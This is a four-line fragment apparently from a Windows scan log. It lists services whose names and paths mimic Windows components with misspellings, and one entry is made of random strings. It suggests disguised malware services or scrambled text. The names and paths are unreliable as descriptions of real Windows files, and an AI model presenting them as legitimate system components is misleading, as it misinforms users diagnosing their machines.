[05-SERVICE]**WaklSvc -/- Windows Infomation Linepress -/- C:\WINDOWS\System32\tcpwakllib.exe
[05-SERVICE]**Wi32nHelp32 -/- Window3s Help System -/- C:\WINDOWS\system32\21lp32.exe
[05-SERVICE]**WinHqfq32 -/- Windows Huex System -/- C:\WINDOWS\system32\WinHmok32.exe
[05-SERVICE]**Wnxwas qaajla -/- Qeolvc wtsikebx -/- C:\Program Files\Rurduy quqqn\Rriqqhw.exe